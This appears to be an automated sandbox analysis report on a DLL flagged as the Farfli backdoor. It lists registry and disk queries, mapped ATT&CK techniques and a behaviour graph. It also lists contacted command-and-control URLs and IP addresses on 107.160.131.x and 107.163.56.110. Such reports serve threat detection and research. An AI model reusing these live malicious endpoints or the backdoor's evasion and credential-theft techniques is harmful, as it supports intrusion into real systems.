Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Queries disk data (e.g. SMART data)
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		1
Masquerading		OS Credential Dumping31
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		111
Process Injection		31
Virtualization/Sandbox Evasion		LSASS Memory31
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
Remote System Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Rundll32		DCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc Filesystem111
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578323 Sample: QCTYoyX422.dll Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 59 host123.zz.am 2->59 61 blogx.sina.com.cn 2->61 63 blog.sina.com.cn 2->63 85 Suricata IDS alerts for network traffic 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 Antivirus / Scanner detection for submitted sample 2->89 91 6 other signatures 2->91 10 loaddll32.exe 1 2->10         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 process5 16 cmd.exe 1 10->16         started        19 rundll32.exe 1 14 10->19         started        22 rundll32.exe 10->22         started        28 5 other processes 10->28 24 cmd.exe 12->24         started        26 cmd.exe 14->26         started        dnsIp6 73 Uses ping.exe to sleep 16->73 75 Uses ping.exe to check the status of other devices and networks 16->75 30 rundll32.exe 16->30         started        65 107.163.56.110, 18530, 49719 TAKE2US United States 19->65 67 107.160.131.253, 18659, 49718 AS40676US United States 19->67 69 2 other IPs or domains 19->69 77 System process connects to network (likely due to code injection or exploit) 19->77 79 Found evasive API chain (may stop execution after checking mutex) 19->79 81 Creates an autostart registry key pointing to binary in C:\Windows 19->81 83 Queries disk data (e.g. SMART data) 22->83 33 cmd.exe 22->33         started        35 conhost.exe 24->35         started        37 PING.EXE 24->37         started        39 conhost.exe 26->39         started        41 PING.EXE 26->41         started        43 WerFault.exe 20 16 28->43         started        45 WerFault.exe 28->45         started        signatures7 process8 signatures9 93 Queries disk data (e.g. SMART data) 30->93 47 cmd.exe 1 30->47         started        95 Uses ping.exe to sleep 33->95 50 conhost.exe 33->50         started        52 PING.EXE 33->52         started        process10 signatures11 97 Uses ping.exe to sleep 47->97 54 PING.EXE 1 47->54         started        57 conhost.exe 47->57         started        process12 dnsIp13 71 127.0.0.1 unknown unknown 54->71

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
QCTYoyX422.dll79%ReversingLabsWin32.Backdoor.Farfli
QCTYoyX422.dll100%AviraTR/Crypt.PEPM.Gen
QCTYoyX422.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
blogx.sina.com.cn
116.133.8.92
truefalse
    		high
    host123.zz.am
    		unknown
    		unknownfalse
      		high
      blog.sina.com.cn
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://107.160.131.254:23588/article.phptrue
          		unknown
          https://blog.sina.com.cn/u/5762479093false
            		high
            http://107.160.131.253:18659//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@true
              		unknown
              http://107.163.56.110:18530/u1129.htmltrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://107.160.131.254:23588/article.phpca)rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://107.160.131.254:23588/article.phpMrundll32.exe, 00000003.00000003.3322173999.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2914623696.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2631291138.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3405735602.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2956982462.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2671445349.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://blog.sina.com.cn/u/5762479093sxrundll32.exe, 00000003.00000002.4676120185.000000000F370000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4528987936.000000000F383000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://blog.sina.com.cn/u/5762479093zZrundll32.exe, 00000003.00000003.4419883388.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4337930780.000000000F39C000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://107.160.131.254:23588/article.phpC:rundll32.exe, 00000003.00000002.4629115941.00000000054DA000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4628998478.00000000052BD000.00000004.00000010.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.microsoft.corundll32.exe, 00000003.00000003.2671535665.00000000057B1000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://107.160.131.254:23588/article.phpDrundll32.exe, 00000003.00000003.3322173999.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2914623696.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2631291138.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3405735602.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2956982462.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2671445349.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://blog.sina.com.cn/u/5762479093mrundll32.exe, 00000003.00000003.4508768955.000000000587B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4507886949.0000000005872000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://upx.sf.netAmcache.hve.13.drfalse
                                  		high
                                  http://107.160.131.254:23588/article.php;rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://blog.sina.com.cn/Hrundll32.exe, 00000003.00000003.4481849158.000000000275B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://blog.sina.com.cn/u/5762479093rundll32.exe, 00000003.00000002.4629883170.0000000005872000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
